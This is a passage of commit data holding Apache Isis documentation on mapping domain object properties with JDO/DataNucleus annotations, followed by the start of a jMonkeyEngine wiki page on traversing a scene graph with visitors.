example:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(length=50)\n@lombok.Getter @lombok.Setter\nprivate String firstName;\n----\n\nThis is a good example of a case where Apache Isis infers domain semantics from the JDO annotation.\n\n\n\n[[__ugfun_how-tos_class-structure_properties_mapping-joda-dates]]\n== Mapping JODA Date\n\nIsis' JDO objectstore bundles DataNucleus' http:\/\/www.datanucleus.org\/documentation\/products\/plugins.html[built-in support] for Joda `LocalDate` and `LocalDateTime` datatypes, meaning that entity properties of these types will be persisted as appropriate data types in the database tables.\n\nIt is, however, necessary to annotate your properties with `@javax.jdo.annotations.Persistent`, otherwise the data won't actually be persisted.\nSee the link:http:\/\/db.apache.org\/jdo\/field_types.html[JDO docs] for more details on this.\n\nMoreover, these datatypes are _not_ in the default fetch group, meaning that JDO\/DataNucleus will perform an additional `SELECT` query for each attribute.\nTo avoid this extra query, the annotation should indicate that the property is in the default fetch group.\n\nFor example, the `ToDoItem` (in the https:\/\/github.com\/isisaddons\/isis-app-todoapp[todoapp example app] (not ASF)) defines the `dueBy` property as follows:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"true\")\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@Getter @Setter\nprivate LocalDate dueBy;\n----\n\n[[__ugfun_how-tos_class-structure_properties_mapping-bigdecimals]]\n== Mapping ``BigDecimal``s (Precision)\n\nWorking with `java.math.BigDecimal` properties takes a little care due to scale\/precision issues.\n\nFor example, suppose we have:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter\nprivate BigDecimal impact;\n----\n\nJDO\/DataNucleus creates, at least with HSQL, the table with the field type as NUMERIC(19). No decimal digits are admitted. (Further details http:\/\/hsqldb.org\/doc\/2.0\/guide\/sqlgeneral-chapt.html#sgc_numeric_types[here].)\n\nWhat this implies is that, when a record is inserted, a log entry similar to this one appears:\n\n[source,sql]\n----\nINSERT INTO ENTITY(..., IMPACT, ....) 
VALUES (...., 0.5, ....)\n----\n\nBut when that same record is retrieved, the log will show that a value of \"0\" is returned, instead of 0.5.\n\nThe solution is to explicitly add the scale to the field like this:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(scale=2)\n@lombok.Getter @lombok.Setter\nprivate BigDecimal impact;\n----\n\nIn addition, you should also set the scale of the `BigDecimal`, using `setScale(scale, roundingMode)`.\n\n
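A short sketch of doing so in a hand-written setter (replacing the Lombok-generated one; `RoundingMode.HALF_UP` is an arbitrary choice for this example, matching the `scale=2` mapping above):\n\n[source,java]\n----\npublic void setImpact(final BigDecimal impact) {\n \/\/ normalize to the same scale as the @Column(scale=2) mapping\n this.impact = impact != null ? impact.setScale(2, java.math.RoundingMode.HALF_UP) : null;\n}\n----\n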
\nMore information can be found http:\/\/www.opentaps.org\/docs\/index.php\/How_to_Use_Java_BigDecimal:_A_Tutorial[here] and http:\/\/www.tutorialspoint.com\/java\/math\/bigdecimal_setscale_rm_roundingmode.htm[here].\n\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs]]\n== Mapping ``Blob``s and ``Clob``s\n\nApache Isis configures JDO\/DataNucleus so that the properties of type `org.apache.isis.applib.value.Blob` and `org.apache.isis.applib.value.Clob` can also be persisted.\n\nAs for xref:ugfun.adoc#__ugfun_how-tos_class-structure_properties_mapping-joda-dates[Joda dates], this requires the `@javax.jdo.annotations.Persistent` annotation.\nHowever, whereas for dates one would always expect this value to be retrieved eagerly, for blobs and clobs it is not so clear cut.\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-blobs]]\n=== Mapping ``Blob``s\n\nFor example, in the `ToDoItem` class (of the https:\/\/github.com\/isisaddons\/isis-app-todoapp\/blob\/0333852ddd18ad67e3356fccf805aa442246790d\/dom\/src\/main\/java\/todoapp\/dom\/todoitem\/ToDoItem.java#L442[todoapp example app] (non-ASF)) the `attachment` property is as follows:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\"),\n @javax.jdo.annotations.Column(name = \"attachment_bytes\", jdbcType=\"BLOB\", sqlType = \"LONGVARBINARY\")\n})\n@Property(\n optionality = Optionality.OPTIONAL\n)\n@lombok.Getter @lombok.Setter\nprivate Blob attachment;\n----\n\nThe three `@javax.jdo.annotations.Column` annotations are required because the mapping classes that Apache Isis provides (https:\/\/github.com\/apache\/isis\/blob\/isis-1.4.0\/component\/objectstore\/jdo\/jdo-datanucleus\/src\/main\/java\/org\/apache\/isis\/objectstore\/jdo\/datanucleus\/valuetypes\/IsisBlobMapping.java#L59[IsisBlobMapping] and https:\/\/github.com\/apache\/isis\/blob\/isis-1.4.0\/component\/objectstore\/jdo\/jdo-datanucleus\/src\/main\/java\/org\/apache\/isis\/objectstore\/jdo\/datanucleus\/valuetypes\/IsisClobMapping.java#L59[IsisClobMapping]) map to 3 columns.\n(It is not an error to omit these `@Column` annotations, but without them the names of the table columns are simply suffixed `_0`, `_1`, `_2` etc.)\n\nIf the `Blob` is mandatory, then use:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\", allowsNull=\"false\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\", allowsNull=\"false\"),\n @javax.jdo.annotations.Column(name = \"attachment_bytes\",\n jdbcType=\"BLOB\", sqlType = \"LONGVARBINARY\",\n allowsNull=\"false\")\n})\n@Property(\n optionality = Optionality.MANDATORY\n)\n@lombok.Getter @lombok.Setter\nprivate Blob attachment;\n----\n\n[NOTE]\n====\nIf specifying a `sqlType` of \"LONGVARBINARY\" does not work, try instead \"BLOB\".\nThere can be differences in behaviour between JDBC drivers.\n====\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-clobs]]\n=== Mapping ``Clob``s\n\nMapping `Clob`s works in a very similar way, but the `jdbcType` and `sqlType` attributes will, respectively, be `CLOB` and `LONGVARCHAR`:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\"),\n @javax.jdo.annotations.Column(name = \"attachment_chars\",\n jdbcType=\"CLOB\", sqlType = \"LONGVARCHAR\")\n})\nprivate Clob doc;\n@Property(\n optionality = Optionality.OPTIONAL\n)\npublic Clob getDoc() {\n return doc;\n}\npublic void setDoc(final Clob doc) {\n this.doc = doc;\n}\n----\n\n[NOTE]\n====\nIf specifying a `sqlType` of \"LONGVARCHAR\" does not work, try instead \"CLOB\". There can be differences in behaviour between JDBC drivers.\n====\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-to-varbinary-or-varchar]]\n=== Mapping to VARBINARY or VARCHAR\n\nInstead of mapping to a sqlType of `LONGVARBINARY` (or perhaps `BLOB`), you might instead decide to map to a `VARBINARY`.\nThe difference is whether the binary data is held \"on-row\" or as a pointer \"off-row\"; with a `VARBINARY` the data is held on-row and so you will need to specify a length.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(name = \"attachment_bytes\", jdbcType=\"BLOB\", sqlType = \"VARBINARY\", length=2048)\n----\n\nThe same argument applies to `LONGVARCHAR` (or `CLOB`); you could instead map to a regular `VARCHAR`:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(name = \"attachment_chars\", sqlType = \"VARCHAR\", length=2048)\n----\nSupport and maximum allowed length will vary by database vendor.\n\n\n\n[[__ugfun_how-tos_class-structure_properties_handling-mandatory-properties-in-subtypes]]\n== Handling Mandatory Properties in Subtypes\n\nIf you have a hierarchy of classes then you need to decide which inheritance strategy to use.\n\n* \"table per hierarchy\", or \"rollup\" (`InheritanceStrategy.SUPERCLASS_TABLE`) +\n+\nwhereby a single table corresponds to the superclass, and also holds the properties of the subtype (or subtypes) being rolled up\n\n* \"table per class\" (`InheritanceStrategy.NEW_TABLE`) +\n+\nwhereby there is a table for both superclass and subclass, in 1:1 correspondence\n\n* \"rolldown\" (`InheritanceStrategy.SUBCLASS_TABLE`) +\n+\nwhereby a single table holds the properties of the subtype, and also holds the properties of its supertype\n\nIn the first \"rollup\" case, we can have a situation where - logically speaking - the property is mandatory in the subtype - but it must be mapped as nullable in the database because it is n\/a for any other subtypes that are rolled up.\n\nIn this situation we must tell JDO that the column is optional, but to Apache Isis we want to enforce it being mandatory. 
This can be done using the `@Property(optionality=Optionality.MANDATORY)` annotation.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Inheritance(strategy = InheritanceStrategy.SUPERCLASS_TABLE)\npublic class SomeSubtype extends SomeSuperType {\n @javax.jdo.annotations.Column(allowsNull=\"true\")\n @Property(optionality=Optionality.MANDATORY)\n @lombok.Getter @lombok.Setter\n private LocalDate date;\n}\n----\n\n[TIP]\n====\nThe `@Property(optionality=...)` annotation is equivalent to the older but still supported `@Optional` and `@Mandatory` annotations.\n====\n\n","old_contents":"[[_ugfun_how-tos_class-structure_properties]]\n= Property\n:Notice: Licensed to the Apache Software Foundation (ASF) under one or more contributor license agreements. See the NOTICE file distributed with this work for additional information regarding copyright ownership. The ASF licenses this file to you under the Apache License, Version 2.0 (the \"License\"); you may not use this file except in compliance with the License. You may obtain a copy of the License at. http:\/\/www.apache.org\/licenses\/LICENSE-2.0 . Unless required by applicable law or agreed to in writing, software distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the License for the specific language governing permissions and limitations under the License.\n:_basedir: ..\/\n:_imagesdir: images\/\n\n\nA property is an instance variable of a domain object, of a scalar type, that holds some state about either a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_entities[domain entity] or a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_view-models[view model].\n\nFor example, a ``Customer``'s `firstName` would be a property, as would their `accountCreationDate` that they created their account.\nAll properties have at least a \"getter\" method, and most properties have also a \"setter\" method (meaning that they are immutable).\nProperties that do _not_ have a setter method are derived properties, and so are not persisted.\n\nFormally speaking, a property is simply a regular JavaBean getter, returning a scalar value recognized by the framework.\nMost properties (those that are editable\/modifiable) will also have a setter and (if persisted) a backing instance field.\nAnd most properties will also have a number of annotations:\n\n* Apache Isis defines its own set own `@Property` annotation for capturing domain semantics.\nIt also provides a `@PropertyLayout` for UI hints (though the information in this annotation may instead be provided by a supplementary xref:ugfun.adoc#_ugfun_object-layout[`.layout.xml`] file\n\n* the properties of domain entities are often annotated with the JDO\/DataNucleus `@javax.jdo.annotations.Column` annotation.\nFor property references, there may be other annotations to indicate whether the reference is bidirectional.\nIt's also possible (using annotations) to define a link table to hold foreign key columns.\n\n* for the properties of view models, then JAXB annotations such as `@javax.xml.bind.annotation.XmlElement` will be present\n\nApache Isis recognises some of these annotations for JDO\/DataNucleus and JAXB and infers some domain semantics from them (for example, the maximum allowable length of a string property).\n\nSince writing getter and setter methods adds quite a bit of boilerplate, it's common to use link:https:\/\/projectlombok.org\/[Project Lombok] to code generate 
these methods at compile time (using Java's annotation processor) simply by adding the `@lombok.Getter` and `@lombok.Setter` annotations to the field.\nThe xref:guides\/ugfun.adoc#_ugfun_getting-started_simpleapp-archetype[SimpleApp archetype] uses this approach.\n\n\n[[__ugfun_how-tos_class-structure_properties_value-vs-reference-types]]\n== Value vs Reference Types\n\nProperties can be either a value types (strings, int, date and so on) or be a reference to another object (for example, an `Order` referencing the `Customer` that placed it).\n\nFor example, to map a string value type:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter \/\/ <1>\nprivate String notes;\n----\n<1> using link:https:\/\/projectlombok.org\/[Project Lombok] annotations to reduce boilerplate\n\nYou could also add the `@Property` annotation if you wished:\n\n[source,java]\n----\n@Property\n@lombok.Getter @lombok.Setter\nprivate String notes;\n----\n\nAlthough in this case it is not required in this case (none of its attributes have been set).\n\nOr to map a reference type:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter\nprivate Customer customer;\n----\n\nIt's ok for a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_entities[domain entity] to reference another domain entity, and for a xref:ugfun.adoc#__ugfun_how-tos_class-structure_class-definition_view-models[view model] to reference both view model and domain entities.\nHowever, it isn't valid for a domain entity to hold a persisted reference to view model (DataNucleus will not know how to persist that view model).\n\n[NOTE]\n====\nFor further details on mapping associations, see the JDO\/DataNucleus documentation for link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/one_to_many.html[one-to-many] associations, link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/many_to_one.html[many-to-one] associations, link:http:\/\/www.datanucleus.org\/products\/accessplatform_4_1\/jdo\/orm\/many_to_many.html[many-to-many] associations, and so on.\n====\n\nFor domain entities, the annotations for mapping value types tend to be different for properties vs action parameters, because JDO annotations are only valid on properties.\nThe table in the xref:ugfun.adoc#_ugfun_how-tos_class-structure_properties-vs-parameters[Properties vs Parameters] section provides a handy reference of each.\n\n\n[[__ugfun_how-tos_class-structure_properties_optional-properties]]\n== Optional Properties\n\n(For domain entities) JDO\/DataNucleus' default is that a property is assumed to be mandatory if it is a primitive type (eg `int`, `boolean`), but optional if a reference type (eg `String`, `BigDecimal` etc).\nTo override optionality in JDO\/DataNucleus the `@Column(allowsNull=\"...\")` annotations is used.\n\nApache Isis on the other hand assumes that all properties (and action parameters, for that matter) are mandatory, not optional.\nThese defaults can also be overridden using Apache Isis' own annotations, specifically `@Property(optionality=...)`, or (because it's much less verbose) using `@javax.annotation.Nullable`.\n\nThese different defaults can lead to incompatibilities between the two frameworks.\nTo counteract that, Apache Isis also recognizes and honours JDO's `@Column(allowsNull=...)`.\n\nFor example, you can write:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@lombok.Getter @lombok.Setter\nprivate LocalDate date;\n----\n\nrather than the more 
verbose:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@Property(optionality=Optionality.OPTIONAL)\n@lombok.Getter @lombok.Setter\nprivate LocalDate date;\n----\n\nThe framework will search for any incompatibilities in optionality (whether specified explicitly or defaulted implicitly) between Isis' defaults and DataNucleus, and refuse to boot if any are found (fail fast).\n\n[[__ugfun_how-tos_class-structure_properties_editable-properties]]\n== Editable Properties\n\nApache Isis provides the capability to allow individual properties to be modified.\nThis is specified using the `@Property(editing=...)` attribute.\n\nFor example:\n\n[source,java]\n----\n@Property(editing = Editing.ENABLED)\n@lombok.Getter @lombok.Setter\nprivate String notes;\n----\n\nIf this is omitted then whether editing is enabled or disabled is defined globally, in the `isis.properties` configuration file; see xref:rgcfg.adoc#__rgcfg_configuring-core_isis-objects-editing[reference configuration guide] for further details.\n\n\n[[__ugfun_how-tos_class-structure_properties_ignoring-properties]]\n== Ignoring Properties\n\nBy default Apache Isis will automatically render all properties in the xref:ugvw.adoc[UI] or in the xref:ugvro.adoc[REST API].\nTo get Apache Isis to ignore a property (exclude it from its metamodel), annotate the getter using `@Programmatic`.\n\nSimilarly, you can tell JDO\/DataNucleus to ignore a property using the `@javax.jdo.annotations.NotPersistent` annotation.\nThis is independent of Apache Isis; in other words that property will still be rendered in the UI (unless also annotated with `@Programmatic`).\n\nFor view models, you can tell JAXB to ignore a property using the `@javax.xml.bind.annotation.XmlTransient` annotation.\nAgain, this is independent of Apache Isis.\n\n\n[[__ugfun_how-tos_class-structure_properties_derived-properties]]\n== Derived Properties\n\nDerived properties are those with a getter but no setter.\nProvided that the property has not been annotated with `@Programmatic`, these will still be rendered in the UI, but they will be read-only (not editable) and their state will not be persisted.\n\nSubtly different, it is also possible to have non-persisted but still editable properties.\nIn this case you will need a getter and a setter, but with the getter annotated using `@NotPersistent`.\nThe implementation of these getters and setters will most likely persist state using other properties (which might be hidden from view using `@Programmatic`).\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.NotPersistent\n@Property(editing=Editing.ENABLED)\npublic String getAddress() { return addressService.toAddress( getLatLong() ); } \/\/ <1>\npublic void setAddress(String address) { setLatLong(addressService.toLatLong(address)); }\n\n@javax.jdo.annotations.Column\nprivate String latLong;\n@Programmatic\npublic String getLatLong() { return latLong; } \/\/ <2>\npublic void setLatLong(String latLong) { this.latLong = latLong; }\n\n@javax.inject.Inject\nAddressService addressService; \/\/ <3>\n----\n<1> the representation of the address, in human readable form, eg \"10 Downing Street, London, UK\"\n<2> the lat\/long representation of the address, eg \"51.503363;-0.127625\"\n<3> an injected service that can convert to\/from address and latLong.\n\n[[__ugfun_how-tos_class-structure_properties_mapping-strings]]\n== Mapping ``String``s (Length)\n\nBy default JDO\/DataNucleus will map string properties to a `VARCHAR(255)`.\nTo limit the length, use the 
`@Column(length=...)` annotation.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(length=50)\n@lombok.Getter @lombok.Setter\nprivate String firstName\n----\n\nThis is a good example of a case where Apache Isis infers domain semantics from the JDO annotation.\n\n\n\n[[__ugfun_how-tos_class-structure_properties_mapping-joda-dates]]\n== Mapping JODA Date\n\nIsis' JDO objectstore bundles DataNucleus' http:\/\/www.datanucleus.org\/documentation\/products\/plugins.html[built-in support] for Joda `LocalDate` and `LocalDateTime` datatypes, meaning that entity properties of these types will be persisted as appropriate data types in the database tables.\n\nIt is, however, necessary to annotate your properties with `@javax.jdo.annotations.Persistent`, otherwise the data won't actually be persisted.\nSee the link:http:\/\/db.apache.org\/jdo\/field_types.html[JDO docs] for more details on this.\n\nMoreover, these datatypes are _not_ in the default fetch group, meaning that JDO\/DataNucleus will perform an additional `SELECT` query for each attribute.\nTo avoid this extra query, the annotation should indicate that the property is in the default fetch group.\n\nFor example, the `ToDoItem` (in the https:\/\/github.com\/isisaddons\/isis-app-todoapp[todoapp example app] (not ASF)) defines the `dueBy` property as follows:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"true\")\n@javax.jdo.annotations.Column(allowsNull=\"true\")\n@Getter @Setter\nprivate LocalDate dueBy;\n----\n\n[[__ugfun_how-tos_class-structure_properties_mapping-bigdecimals]]\n== Mapping ``BigDecimal``s (Precision)\n\nWorking with `java.math.BigDecimal` properties takes a little care due to scale\/precision issues.\n\nFor example, suppose we have:\n\n[source,java]\n----\n@lombok.Getter @lombok.Setter\nprivate BigDecimal impact;\n----\n\nJDO\/DataNucleus creates, at least with HSQL, the table with the field type as NUMERIC(19). No decimal digits are admitted. (Further details http:\/\/hsqldb.org\/doc\/2.0\/guide\/sqlgeneral-chapt.html#sgc_numeric_types[here]).\n\nWhat this implies is that, when a record is inserted, a log entry similar to this one appears:\n\n[source,java]\n----\nINSERT INTO ENTITY(..., IMPACT, ....) 
VALUES (...., 0.5, ....)\n----\n\nBut when that same record is retrieved, the log will show that a value of \"0\" is returned, instead of 0.5.\n\nThe solution is to explicitly add the scale to the field like this:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(scale=2)\n@lombok.Getter @lombok.Setter\nprivate BigDecimal impact;\n----\n\nIn addition, you should also set the scale of the `BigDecimal`, using `setScale(scale, roundingMode)`.\n\nMore information can be found http:\/\/www.opentaps.org\/docs\/index.php\/How_to_Use_Java_BigDecimal:_A_Tutorial[here] and http:\/\/www.tutorialspoint.com\/java\/math\/bigdecimal_setscale_rm_roundingmode.htm[here].\n\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs]]\n== Mapping ``Blob``s and ``Clob``s\n\nApache Isis configures JDO\/DataNucleus so that the properties of type `org.apache.isis.applib.value.Blob` and `org.apache.isis.applib.value.Clob` can also be persisted.\n\nAs for xref:ugfun.adoc#__ugfun_how-tos_class-structure_properties_mapping-joda-dates[Joda dates], this requires the `@javax.jdo.annotations.Persistent` annotation.\nHowever, whereas for dates one would always expect this value to be retrieved eagerly, for blobs and clobs it is not so clear cut.\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-blobs]]\n=== Mapping ``Blob``s\n\nFor example, in the `ToDoItem` class (of the https:\/\/github.com\/isisaddons\/isis-app-todoapp\/blob\/0333852ddd18ad67e3356fccf805aa442246790d\/dom\/src\/main\/java\/todoapp\/dom\/todoitem\/ToDoItem.java#L442[todoapp example app] (non-ASF) the `attachment` property is as follows:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\"),\n @javax.jdo.annotations.Column(name = \"attachment_bytes\", jdbcType=\"BLOB\", sqlType = \"LONGVARBINARY\")\n})\n@Property(\n optionality = Optionality.OPTIONAL\n)\n@lombok.Getter @lombok.Setter\nprivate Blob attachment;\n----\n\nThe three `@javax.jdo.annotations.Column` annotations are required because the mapping classes that Apache Isis provides (https:\/\/github.com\/apache\/isis\/blob\/isis-1.4.0\/component\/objectstore\/jdo\/jdo-datanucleus\/src\/main\/java\/org\/apache\/isis\/objectstore\/jdo\/datanucleus\/valuetypes\/IsisBlobMapping.java#L59[IsisBlobMapping] and https:\/\/github.com\/apache\/isis\/blob\/isis-1.4.0\/component\/objectstore\/jdo\/jdo-datanucleus\/src\/main\/java\/org\/apache\/isis\/objectstore\/jdo\/datanucleus\/valuetypes\/IsisClobMapping.java#L59[IsisClobMapping]) map to 3 columns.\n(It is not an error to omit these `@Column` annotations, but without them the names of the table columns are simply suffixed `_0`, `_1`, `_2` etc.\n\nIf the `Blob` is mandatory, then use:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\", allowsNull=\"false\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\", allowsNull=\"false\"),\n @javax.jdo.annotations.Column(name = \"attachment_bytes\",\n jdbcType=\"BLOB\", sqlType = \"LONGVARBINARY\",\n allowsNull=\"false\")\n})\n@Property(\n optionality = Optionality.MANDATORY\n)\n@lombok.Getter @lombok.Setter\nprivate Blob attachment;\n----\n\n[NOTE]\n====\nIf specifying a `sqlType` of \"LONGVARBINARY\" does not work, try instead \"BLOB\".\nThere can be differences in behaviour between JDBC 
drivers.\n====\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-clobs]]\n=== Mapping ``Clob``s\n\nMapping `Clob`s works in a very similar way, but the `jdbcType` and `sqlType` attributes will, respectively, be `CLOB` and `LONGVARCHAR`:\n\n[source,java]\n----\n@javax.jdo.annotations.Persistent(defaultFetchGroup=\"false\", columns = {\n @javax.jdo.annotations.Column(name = \"attachment_name\"),\n @javax.jdo.annotations.Column(name = \"attachment_mimetype\"),\n @javax.jdo.annotations.Column(name = \"attachment_chars\",\n jdbcType=\"CLOB\", sqlType = \"LONGVARCHAR\")\n})\nprivate Clob doc;\n@Property(\n optionality = Optionality.OPTIONAL\n)\npublic Clob getDoc() {\n return doc;\n}\npublic void setDoc(final Clob doc) {\n this.doc = doc;\n}\n----\n\n[NOTE]\n====\nIf specifying a `sqlType` of \"LONGVARCHAR\" does not work, try instead \"CLOB\". There can be differences in behaviour between JDBC drivers.\n====\n\n[[__ugfun_how-tos_class-structure_properties_mapping-blobs-and-clobs_mapping-to-varbinary-or-varchar]]\n=== Mapping to VARBINARY or VARCHAR\n\nInstead of mapping to a sqlType of `LONGVARBINARY` (or perhaps `BLOB`), you might instead decide to map to a `VARBINARY`.\nThe difference is whether the binary data is held \"on-row\" or as a pointer \"off-row\"; with a `VARBINARY` the data is held on-row and so you will need to specify a length.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(name = \"attachment_bytes\", jdbcTypr=\"BLOB\", sqlType = \"VARBINARY\", length=2048)\n----\n\nThe same argument applies to `LONGVARCHAR` (or `CLOB`); you could instead map to a regular `VARCHAR`:\n\n[source,java]\n----\n@javax.jdo.annotations.Column(name = \"attachment_chars\", sqlType = \"VARCHAR\", length=2048)\n----\nSupport and maximum allowed length will vary by database vendor.\n\n\n\n[[__ugfun_how-tos_class-structure_properties_handling-mandatory-properties-in-subtypes]]\n== Handling Mandatory Properties in Subtypes\n\nIf you have a hierarchy of classes then you need to decide which inheritance strategy to use.\n\n* \"table per hierarchy\", or \"rollup\" (`InheritanceStrategy.SUPERCLASS_TABLE`) +\n+\nwhereby a single table corresponds to the superclass, and also holds the properties of the subtype (or subtypes) being rolled up\n\n* \"table per class\" (`InheritanceStrategy.NEW_TABLE`) +\n+\nwhereby is a table for both superclass and subclass, in 1:1 correspondence\n\n* \"rolldown\" (`InheritanceStrategy.SUBCLASS_TABLE`) +\n+\nwhereby a single table holds the properties of the subtype, and also holds the properties of its supertype\n\nIn the first \"rollup\" case, we can have a situation where - logically speaking - the property is mandatory in the subtype - but it must be mapped as nullable in the database because it is n\/a for any other subtypes that are rolled up.\n\nIn this situation we must tell JDO that the column is optional, but to Apache Isis we want to enforce it being mandatory. 
This can be done using the `@Property(optionality=Optionality.MANDATORY)` annotation.\n\nFor example:\n\n[source,java]\n----\n@javax.jdo.annotations.Inheritance(strategy = InheritanceStrategy.SUPER_TABLE)\npublic class SomeSubtype extends SomeSuperType {\n @javax.jdo.annotations.Column(allowsNull=\"true\")\n @Property(optionality=Optionality.MANDATORY)\n @lombok.Getter @lombok.Setter\n private LocalDate date;\n}\n----\n\n[TIP]\n====\nThe `@Property(optionality=...)` annotation is equivalent to the older but still supported `@Optional` annotation and `@Mandatory` annotations.\n====\n\n","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"732996fc5636f1deb2c221208be979047c350653","subject":"Update traverse_scenegraph.adoc","message":"Update traverse_scenegraph.adoc\n\nFixed broken new lines.","repos":"jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org,jMonkeyEngine\/wiki.jmonkeyengine.org","old_file":"src\/docs\/asciidoc\/jme3\/advanced\/traverse_scenegraph.adoc","new_file":"src\/docs\/asciidoc\/jme3\/advanced\/traverse_scenegraph.adoc","new_contents":"= Traverse the SceneGraph\n:author: \n:revnumber: \n:revdate: 2016\/03\/17 20:48\n:keywords: spatial, node, mesh, geometry, scenegraph\n:relfileprefix: ..\/..\/\n:imagesdir: ..\/..\nifdef::env-github,env-browser[:outfilesuffix: .adoc]\n\n\nYou can run a search across the whole scene graph for individual Spatials (`Nodes` and `Geometry`s) by custom criteria, such as the Spatial's name, the Spatial's class, the Spatial's user data, or the Spatial's Controls. You do this when you want to modify the found nodes (move them, call a method, etc) but you don't have a local variable for them.\n\n\n== Example Use Cases\n\n*Example 1:*\n\n. You have created a procedural scene with lots of dynamically generated elements.\n. You want to find individual Spatials under ever-changing conditions and modify their state. \n\n*Example 2:*\n\n. You created a mostly static scene in the jMonkeyEngine SDK and exported it as a .j3o file. +\nThe scene also contains interactive objects, for example a particle emitter, spatials with user data, or spatials with custom controls. \n. You load the .j3o scene using the assetManager. \n. You want to interact with one of the loaded interactive scene elements in your Java code. +\nFor example, you want to call `emitAllParticles()` on the particle emitter. Or you want to find all NPCs' Geometries with a custom CivilianControl, and call the CivilianControl method that makes them start acting their role.\n\nIn this case, you can use a SceneGraphVisitorAdapter to identify and access the Spatials in question.\n\n\n== Code Sample\n\nFor each search, you create a `com.jme3.scene.SceneGraphVisitor` (or `SceneGraphVisitorAdapter`) that defines your search criteria and what you want to do with the found Spatials. Then you call the `depthFirstTraversal(visitor)` or `breadthFirstTraversal(visitor)` method of the Spatial (e.g. the rootNode, or better, a subnode) to start the search.\n\n[source,java]\n----\n\nSceneGraphVisitor visitor = new SceneGraphVisitor() {\n\n @Override\n public void visit(Spatial spatial) {\n \/\/ search criterion can be control class:\n MyControl control = spatial.getControl(MyControl.class);\n if (control != null) {\n \/\/ you have access to any method, e.g. 
name.\n System.out.println(\"Instance of \" + control.getClass().getName() \n + \" found for \" + spatial.getName());\n }\n }\n\n};\n \n\/\/ Now scan the tree either depth first...\nrootNode.depthFirstTraversal(visitor);\n\/\/ ... or scan it breadth first.\nrootNode.breadthFirstTraversal(visitor);\n\n----\n\nWhich of the two methods is faster depends on how you designed the scenegraph, and what tree element you are looking for. If you are searching for a single Geometry that is a \u201cleaf\u201d of the tree, and then stop searching, depth-first may be faster. If you search for a high-level grouping Node, breadth-first may be faster. \n\nThe choice of depth- vs breadth-first also influences the order in which found elements are returned (children first or parents first). If you want to modify user data that is inherited from the parent node (e.g. transformations), the order of application is important, because the side-effects add up.\n\nYou can use the SceneGraphVisitorAdapter class to scan separately for Geometry and Nodes, as in the sketch below.\n\n
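A minimal sketch of such an adapter (the println calls are placeholder actions only), overriding the `visit(Geometry)` and `visit(Node)` callbacks separately:\n\n[source,java]\n----\nSceneGraphVisitorAdapter adapter = new SceneGraphVisitorAdapter() {\n\n @Override\n public void visit(Geometry geometry) {\n \/\/ called for leaf geometries only\n System.out.println(\"Geometry: \" + geometry.getName());\n }\n\n @Override\n public void visit(Node node) {\n \/\/ called for grouping nodes only\n System.out.println(\"Node with \" + node.getQuantity() + \" children\");\n }\n};\nrootNode.depthFirstTraversal(adapter);\n----\n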
